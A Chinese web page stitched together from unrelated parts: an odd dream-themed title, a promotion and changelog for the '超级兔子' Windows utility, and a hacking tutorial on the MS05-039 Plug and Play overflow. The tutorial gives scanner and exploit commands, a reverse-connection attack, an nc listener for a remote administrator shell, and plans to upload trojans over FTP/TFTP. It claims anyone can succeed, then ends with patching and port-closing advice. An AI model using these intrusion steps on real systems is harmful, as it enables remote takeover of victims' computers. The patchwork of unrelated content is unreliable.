梦见抬棺材:怎么解决数据溢出?

用超级兔子做一边系统！整理垃圾文件，还有注册表！

超级兔子下载地址：超级兔子魔法设置 V7.39（最新版）
http://www.skycn.com/soft/2993.html

软件介绍：
超级兔子是一个完整的系统维护工具，可能清理你大多数的文件、注册表里面的垃圾，同时还有强力的软件卸载功能，专业的卸载可以清理一个软件在电脑内的所有记录。
超级兔子共有8大组件，可以优化、设置系统大多数的选项，打造一个属于自己的Windows。超级兔子上网精灵具有IE修复、IE保护、恶意程序检测及清除工能，还能防止其它人浏览网站，阻挡色情网站，以及端口的过滤。
超级兔子系统检测可以诊断一台电脑系统的CPU、显卡、硬盘的速度，由此检测电脑的稳定性及速度，还有磁盘修复及键盘检测功能。超级兔子进程管理器具有网络、进程、窗口查看方式，同时超级兔子网站提供大多数进程的详细信息，是国内最大的进程库。
超级兔子安全助手可能隐藏磁盘、加密文件，超级兔子系统备份是国内唯一能完整保存Windows XP注册表的软件，彻底解决系统上的问题。
2006-1-24 超级兔子7.39
一、超级兔子快速关机3.2
1 改进的“今天及明天”设置
2 新增自定义日期设置
二、超级兔子进程查询1.3
1 新增多进程终止功能
2 主界面新增进程在线查询功能
三、超级兔子IE修复专家7.39
1 新增10552种木马/广告程序检测
四、超级上网精灵7.39
1 新增10552种木马/广告程序检测
五、超级兔子优化王7.39
1 改进标准卸载的提示信息
2 新增以下软件卸载
xBar图铃随e下
SearchNet
New.net
电鹰搜索
DIYNet彩信
改进以下软件卸载
MSIBM
酷猴
3 可完整卸载83种软件
IE插件
划词搜索
网络猪
很棒小秘书/很棒通行证
中文搜索
小蜜蜂
Dudu下载加速器
DMCast 桌面传媒
新浪点点通
新浪iGame 游戏总动园
17lele网游
完美网译通
搜一搜
网易搜霸
Alibaba 商机直通车
迷你讯雷
迷你PP
虎翼DIY吧
青娱乐
5188彩信助手
中文通
联众世界
博采网摘
IE伴郎
8848天下搜索
8848购物搜索
太极天下搜索
易趣购物
易趣工具条
NetFish 网络钓鱼克星
搜狗直通车
CopySo拷贝搜
ISC
网址极限
娱乐心空
MMSAssist彩信通
iBar
WinStdup
ZDA 天网广告
MSSer
VIKA唯刊
网上购物
暴风下载器
酷猴
直达网址
iShare
QQ 搜索小帮手
Infofo 工具栏
Alexa 工具栏
Google 工具栏
多多QQ表情
U88 财富快车
Bysoo 百搜工具栏
YOK 工具栏
酷客娱乐平台
Update
SeAd/DMAd
天天搜索
ShareHelper
搜易财富火箭
播霸/猫眼网络电视迷你版
MSIBM
Zcom
SoSo工具条
xBar图铃随e下
SearchNet
New.net
电鹰搜索
DIYNet 彩信
金山安全助手
雅虎助手
3721上网助手
3721网络实名
3721搜索助手
3721下载专家
360搜
一搜工具条
CNNIC中文上网官方版
CNNIC无忧上网
百度上网伴侣
百度搜霸
百度超级搜霸
RealPlayer
六、完全免费，无需注册，无需设置IE主页，即可使用所有功能，提供免费在线升级，不捆绑任何其它软件。

系统漏洞溢出主要分为远程溢出和本地溢出两种，本地溢出造成的后果是普通的用户可以利用漏洞进行权限的提升，而远程溢出的后果则是被黑客进行远程控制，进而造成被黑客安装程序来查看、更改或删除数据；或者创建拥有完全用户权限的新账户等一系列危险的操作。
在计算机内部，输入的数据通常被存放在一个临时的空间内，这个临时的空间就被成为缓冲区，缓冲区的容量事先已经被程序或操作系统定义好了。系统漏洞溢出主要是程序在向缓冲区内填充数据时，如果数据很多，超出了缓冲区的本身的容量，进而造成数据溢出存储空间，使装不下的数据覆盖在合法的数据上。这时系统就会出错，让黑客越过审核机制入侵系统。

在使用系统漏洞溢出攻击时，常常听到ShellCode这个词。ShellCode实际上就是一组可以完成我们想要的功能的机器代码，这些代码通常都是以十六进制的数组形式存在的，黑客常常会根据自己需要实现的目的来编写这段代码。最常见的ShellCode形式，就是一个打开DOS窗口的代码，从而使黑客得到一个远程的Shell，这样就完成了系统漏洞溢出的操作。成功的进行了远程溢出操作后，黑客还会通过FTP、Tftp等命令上传可以进行远程控制的程序并执行，最终达到远程控制的目的，这也是现在流行利用漏洞溢出进行入侵的原因。

入侵实战

第一步：漏洞分析

本次讲解以Windows即插即用远程代码执行漏洞（MS05-039）为例。造成该漏洞的主要原因是即插即用服务中未经检查的缓冲区出现了溢出漏洞，受影响的系统主要包括Windows 2000和WindowsXP SP1 。

第二步：扫描计算机

首先我们来查找存在MS05-039漏洞的远程计算机，由于存在这个漏洞的系统都开放了445和139端口，所以我们只要利用一个扫描器对一个大范围的IP段的445端口进行扫描即可。那些打开445端口的计算机就有可能存在MS05-039漏洞，这样为我们进行远程溢出提供了目标。

今天我们使用的扫描器是s.exe。打开一个命令提示符窗口，输入命令：s tcp 192.168.0.1 192.168.0.255 445 120 /save，这段命令的意思是利用120个线程数，扫描192.168.0.1到192.168.0.255这个IP段中TCP协议下的445端口，扫描的线程为120，并将扫描的结果保存到硬盘中一个名为Result的文本文件中（图1）。

第三步：溢出系统

现在我们就可以利用漏洞工具对远程计算机进行攻击。我们首先来看看该工具的使用方法。打开一个命令提示符窗口，执行漏洞利用工具后查看它的使用方法（图2）。从图中我们可以看到，该工具是通过反弹连接的形式进行远程数据溢出的，这样即使远程计算机安装有网络防火墙，我们也可以成功地进行溢出操作。

下面我们在命令提示符窗口执行：ms05039 192.168.0.3 192.168.0.2 4466 1，首先来说说这段命令的意思。192.168.0.3 是远程计算机的IP地址，192.168.0.2是本地计算机的IP地址，4466是成功溢出远程计算机数据后将连接到本地计算机的4466这个端口，1代表远程系统是中文版本，如果是英文就设置为0。当成功的执行了远程数据的溢出操作后，漏洞利用工具会出现溢出成功的提示（图3）。

当我们成功溢出远程数据后，就需要马上通过nc来监听反弹连接到本地4466端口的数据。重新再开启一个命令提示符窗口，在输入命令：nc -vv -l -p 4466后进行数据监听，很快我们就可以在这个监听窗口得到一个拥有管理员权限的远程SHELL（图4）。

至此，我们已经成功的进入了远程计算机的系统。但是毕竟在DOS界面下工作有诸多的不便，所以我们在获得远程计算机的SHELL后，会通过FTP、TFTP等方法上传可以进行图形界面下工作的木马等程序，这样我们就可以轻松的对远程计算机进行控制。换句话说，我们从那时起就真正的可以“主宰”这台远程主机的命运了。

攻击后果以及防范

通过系统漏洞溢出进行远程攻击已经成为当前最为行之有效的一种攻击手段，这种方法不但可以对个人的电脑进行攻击，还可以对某些服务器进行攻击。除此以外，溢出攻击在操作使用上也非常的简单，任何朋友只要按照前面讲述的步骤进行操作，基本上都能成功的进行溢出攻击。

介于系统漏洞溢出这种攻击的高危害性，所以人们一定要提高警惕，使用各种有效的方法对这种攻击手段进行防范。

首先，由于这种攻击手段是由系统漏洞引起的，所以为了避免系统遭受到攻击，应该尽快的安装相应的安全补丁。就拿今天举例的这个Windows即插即用远程代码执行漏洞来说吧，用户就应该尽快的安装MS05039漏洞补丁。

MS05039漏洞补丁：http://www.microsoft.com/china/technet/security/bulletin/MS05-039.mspx

其次，由于某些原因使用户不能在第一时间安装补丁的，也可以通过其他的一些变通的办法来阻止系统受到侵害，当然每个漏洞变通的解决办法是不相同的。就MS05039漏洞而言，用户只要通过对系统信息的重新配置，就可以封堵系统TCP 端口139和445端口，然后切断黑客和病毒入侵的途径。

关闭139端口的方法

1.点击“开始菜单”后，选择“设置”菜单中的“网络连接”选项。
2.接着在弹出的“网络连接”窗口中点击“本地连接”选目的“属性”命令。
3.然后在弹出的“本地连接属性”窗口中选取“Internet协议（TCP/IP）”选项并点击“属性”按钮。
4.最后进入“高级TCP/IP设置”窗口，选择“WINS设置”选项卡，在里面有一项“禁用TCP/IP的NETBIOS”，选择该选项后就会关闭139端口了。

关闭445端口的方法

1.在命令行窗口运行修改注册表命令RegEdit。
2.在弹出的注册表编辑窗口的左边找到下面目录HKEY_LOCAL_MACHINESystemCurrentContr
olSetServicesNetBTParameters
你可以一级一级目录往下点击，也可用“查找”命令找到NetBT项，然后点击Parameters项。
3.在编辑窗口的右边空白处点击鼠标右键，出现的“新建”菜单中选择“DWORD值”，将新建的DWORD参数命名为“SMBDeviceEnabled”，数值为缺省的“0”。
4.修改完后退出RegEdit，重启机器。
5.运行“netstat –an”，你将会发现你的445端口已经不再Listening了。

最后，及时安装最新版本的杀毒软件，并且升级到最新的病毒库，打开及时监控功能，这样虽然不能彻底防范黑客和病毒对我们系统的入侵，当可以在第一时间对发现的可疑恶意程序进行查杀。